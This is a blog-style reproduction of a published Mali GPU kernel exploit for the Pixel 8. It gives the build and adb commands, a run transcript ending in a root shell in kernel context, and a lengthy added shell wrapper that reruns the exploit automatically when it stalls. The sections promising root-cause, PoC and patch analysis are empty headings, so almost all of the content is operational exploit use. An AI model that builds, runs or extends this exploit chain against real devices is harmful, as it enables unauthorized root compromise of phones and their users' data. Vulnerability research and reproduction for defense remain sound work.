Analysis and reproduction of the article "Gaining kernel code execution on an MTE-enabled Pixel 8"
Arm Mali GPU
(I bought a Pixel 8, which also conveniently serves as a spare phone~)
- Factory image version: UD1A.231105.004
- NDK version: 26.2.11394342
- OpenCL headers version: v2023.04.17
Reproduction
- Build
# 1. Pull the Mali userspace driver the exploit links against
╰─ adb pull vendor/lib64/egl/libGLES_mali.so .
# 2. Copy the OpenCL headers into the exploit directory
╰─ cp -r ../OpenCL-Headers-2023.04.17/CL .
# 3. Compile with the NDK aarch64 clang
╰─ /Users/lzx/Library/Android/sdk/ndk/26.2.11394342/toolchains/llvm/prebuilt/darwin-x86_64/bin/aarch64-linux-android34-clang -DSHELL -DCL_TARGET_OPENCL_VERSION=300 -I. -L. mali_jit_csf.c mem_read_write.c mempool_utils.c -lGLES_mali -o mali_jit_csf
# 4. The result is the mali_jit_csf binary
- Run
╰─ adb push mali_jit_csf /data/local/tmp
╰─ adb shell
shiba:/ $ cd /data/local/tmp
shiba:/data/local/tmp $ LD_LIBRARY_PATH=/vendor/lib64/egl ./mali_jit_csf
mali_fd 3
corrupted_jit_addr 6000001000
kernel success
kernel success
queue kernel
jit_grow addr 6000001000
Size after grow: 22f6
Final grow size: 23c7
keep alive jit_addr 60023d1000
Size after free: 21fd, trim_level 6
writing to gpu_va 6002301000
found reused page 5fffef6000, 0
pgd entry found at index 0 400008972ef443
overwrite addr : 5ffff00b50 b50
overwrite addr : 5fffb00b50 b50
overwrite addr : 5fff900b50 b50
overwrite addr : 5ffff00714 714
overwrite addr : 5fffb00714 714
overwrite addr : 5fff900714 714
result 50
shiba:/data/local/tmp # id
uid=0(root) gid=0(root) groups=0(root) context=u:r:kernel:s0
shiba:/data/local/tmp # getenforce
getenforce: Couldn't get enforcing status: No such file or directory
1|shiba:/data/local/tmp # ^C
130|shiba:/data/local/tmp # ^D
shiba:/data/local/tmp $
The first time I ran it, it did hang as the README says; the second time it ran fine.
When running the first time, the exploit sometimes stalls after printing the last "overwrite addr" message. If that happens (stalled for more than 10 seconds, though pausing for a few seconds is normal), then simply kill the exploit and rerun it. It should not stall the second time.
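The stall-and-rerun handling described above can be automated. The script below is an added example, not code from the original post or from the github/securitylab repository: a POSIX sh wrapper that runs the exploit, mirrors its output to the terminal and a log file, kills and restarts it when the log has stopped growing for longer than the stall threshold, and otherwise leaves the root shell the exploit spawns attached to the terminal. The function name, the log file, the 10-second threshold and the use of the "result ..." line as the success marker (it is the last line the exploit prints before the root prompt in the transcript above) are assumptions made for this example.

```shell
#!/bin/sh
# Added example: wrapper around mali_jit_csf that applies the README's
# "kill the exploit and rerun it" advice automatically. Not part of the
# original post or of the github/securitylab repository.
#
# Usage: run_with_stall_retry LOGFILE IDLE_SECS MAX_ATTEMPTS CMD [ARGS...]
#   e.g. run_with_stall_retry /data/local/tmp/run.log 10 3 ./mali_jit_csf
#
# CMD's output is mirrored to the terminal and to LOGFILE. A run counts as
# stalled when LOGFILE has not grown for IDLE_SECS seconds before the
# "result ..." line (assumed success marker, taken from the transcript) has
# appeared. Stalled runs are killed and CMD is started again, up to
# MAX_ATTEMPTS times. Returns 0 once a run prints the marker, 1 otherwise.
run_with_stall_retry() {
    log=$1; idle=$2; max=$3; shift 3
    pidfile="$log.pid"
    # The child records its own PID before exec'ing CMD, so the monitor kills
    # the exploit itself rather than the tee at the end of the pipeline.
    child='echo $$ > "$1"; shift; exec "$@"'
    attempt=1
    while [ "$attempt" -le "$max" ]; do
        : > "$log"; rm -f "$pidfile"
        echo "[stall-retry] attempt $attempt/$max: $*"
        if [ -t 0 ]; then
            # Keep the terminal as stdin so the root shell spawned on success
            # is usable (a background job would otherwise read /dev/null).
            sh -c "$child" sh "$pidfile" "$@" <&0 2>&1 | tee "$log" &
        else
            sh -c "$child" sh "$pidfile" "$@" 2>&1 | tee "$log" &
        fi
        last=0; quiet=0; reached=0
        while :; do
            sleep 1
            pid=$(cat "$pidfile" 2>/dev/null || true)
            [ -n "$pid" ] && kill -0 "$pid" 2>/dev/null || break
            if grep -q '^result ' "$log"; then
                reached=1      # marker seen: leave the root shell running
                break
            fi
            size=$(wc -c < "$log" | tr -d ' ')
            if [ "$size" -ne "$last" ]; then
                last=$size; quiet=0
            else
                quiet=$((quiet + 1))
            fi
            if [ "$quiet" -ge "$idle" ]; then
                echo "[stall-retry] no output for ${idle}s, killing pid $pid"
                kill "$pid" 2>/dev/null || true
                break
            fi
        done
        wait || true    # on success this blocks until the root shell exits
        if [ "$reached" -eq 1 ] || grep -q '^result ' "$log"; then
            return 0
        fi
        attempt=$((attempt + 1))
    done
    echo "[stall-retry] gave up after $max attempt(s); last log in $log"
    return 1
}

# When run as a script: sh stall_retry.sh ./mali_jit_csf
if [ "$#" -gt 0 ]; then
    run_with_stall_retry "${LOGFILE:-./run.log}" "${IDLE_SECS:-10}" \
        "${MAX_ATTEMPTS:-3}" "$@"
fi
```

Run it as a script (for example `LD_LIBRARY_PATH=/vendor/lib64/egl sh stall_retry.sh ./mali_jit_csf` from /data/local/tmp) rather than sourcing it into an interactive shell: with job control active, a background job that reads the terminal would be stopped with SIGTTIN, whereas a non-interactive script keeps the exploit's shell attached to the terminal. Stall detection is based on output inactivity, not total runtime, so the few-second pauses the README calls normal do not trigger a restart as long as they stay under IDLE_SECS.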
Root cause
PoC
Patch
Conclusion
References
- https://github.blog/security/vulnerability-research/gaining-kernel-code-execution-on-an-mte-enabled-pixel-8/
- https://github.com/github/securitylab/tree/main/SecurityExploits/Android/Mali/CVE_2023_6241
- https://developers.google.com/android/images?hl=zh-cn
- https://github.com/KhronosGroup/OpenCL-Headers/releases/tag/v2023.04.17